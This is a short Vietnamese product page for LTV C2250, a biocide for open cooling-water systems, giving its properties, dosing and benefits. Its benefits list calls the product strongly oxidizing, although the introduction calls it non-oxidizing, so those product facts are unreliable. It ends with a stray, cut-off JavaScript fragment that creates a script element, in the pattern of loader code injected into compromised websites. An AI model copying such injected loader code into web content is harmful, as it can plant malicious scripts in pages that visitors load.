Mon,21-05-2018

HOÁ CHẤT ỨC CHẾ VI SINH TRONG HỆ THỐNG GIẢI NHIỆT- LTV C2250

Hoá chất ức chế vi sinh LTV C2250 là chất diệt vi sinh không có tính oxi hoá ít tạo bọt, được sử dụng để xử lý vi sinh  trong hệ thống giải nhiệt hở. Việc xử lý bằng hoá chất ức chế vi sinh LTV C2250 không bị ảnh hưởng bới nồng độ của muối  hòa tan, độ cứng, sự có mặt của chất bẩn dầu và chất đồng trùng hợp

 

1.  Giới thiệu hoá chất ức chế vi sinh

Hoá chất ức chế vi sinh LTV C2250 là chất diệt vi sinh không có tính oxi hoá ít tạo bọt, được sử dụng để xử lý vi sinh  trong hệ thống giải nhiệt hở. Việc xử lý bằng hoá chất ức chế vi sinh LTV C2250 không bị ảnh hưởng bới nồng độ của muối  hòa tan, độ cứng, sự có mặt của chất bẩn dầu và chất đồng trùng hợp. Hoá chất ức chế vi sinh LTV C2250 còn hiệu quả trong việc ức chế vi khuẩn Legionella.  
Hoá chất ức chế vi sinh LTV C2250 không chứa kim loại nặng, chỉ chứa hỗn hợp chất hữu cơ thể phân hủy. Vì thế, việc sử dụng hoá chất ức chế vi sinh LTV C2250 để xử nước nước mát thân thiện với môi trường. 
  Đặc tính:   
Cảm quan                  : Chất lỏng không màu 
pH, 1% dung dịch       : 5.0 ÷ 8.0
Tỷ trọng                    : 1.05 - 1.15

2.  Ứng dụng hoá chất ức chế vi sinh 

Tần suất bổ sung hóa chất tùy thuộc vào điều kiện từng hệ thống cụ thể (thông thường là 1-2  lần/tuần).   

3.  Ích lợi sản phẩm hoá chất ức chế vi sinh

Hiệu quả diệt vi sinh trong phạm vi rộng. 
Hiệu quả trong việc tiêu diệt vi khuẩn Legionella. 
Có thể phân hủy sau khi sử dụng.
Thân thiện với môi trường. 
Hoạt tính oxi hoá mạnh và ít tạo bọt.  
Ức chế sự phát triển vi sinh trên thiết bị truyền nhiệt và bề mặt bay hơi. 
 
 

var d=document;var s=d.createElement('script');